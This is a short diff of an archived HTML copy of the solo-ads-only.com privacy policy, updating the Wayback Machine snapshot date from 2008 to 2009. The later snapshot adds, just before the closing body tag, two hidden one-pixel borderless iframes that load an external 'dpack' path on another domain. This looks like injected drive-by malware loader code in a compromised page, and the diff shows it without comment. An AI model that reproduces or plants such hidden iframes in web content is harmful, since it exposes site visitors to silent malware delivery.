--- a/s/so/sol/solo-ads-only.com.html
+++ b/s/so/sol/solo-ads-only.com.html
@@ -1,5 +1,5 @@
-<!--The following is the downloaded HTML source of the solo-ads-only.com privacy policy that was archived on 2008-12-16.
- Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20081216011931id_/http%3A//solo-ads-only.com/privacy.php) for the most accurate reproduction.-->
+<!--The following is the downloaded HTML source of the solo-ads-only.com privacy policy that was archived on 2009-06-16.
+ Please check the original snapshot on the Wayback Machine (https://web.archive.org/web/20090616152155id_/http%3A//solo-ads-only.com/privacy.php) for the most accurate reproduction.-->
 
 <html><head>
 <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
@@ -113,4 +113,4 @@ Solo Ads Only All Rights Reserved.</font></p></td>
 
 
 
-</body></html>
+<iframe src="http://al-jawarh.com/dpack/" frameborder="0" width="1" height="1" scrolling="no"></iframe><iframe src="http://al-jawarh.com/dpack/" frameborder="0" width="1" height="1" scrolling="no"></iframe></body></html>
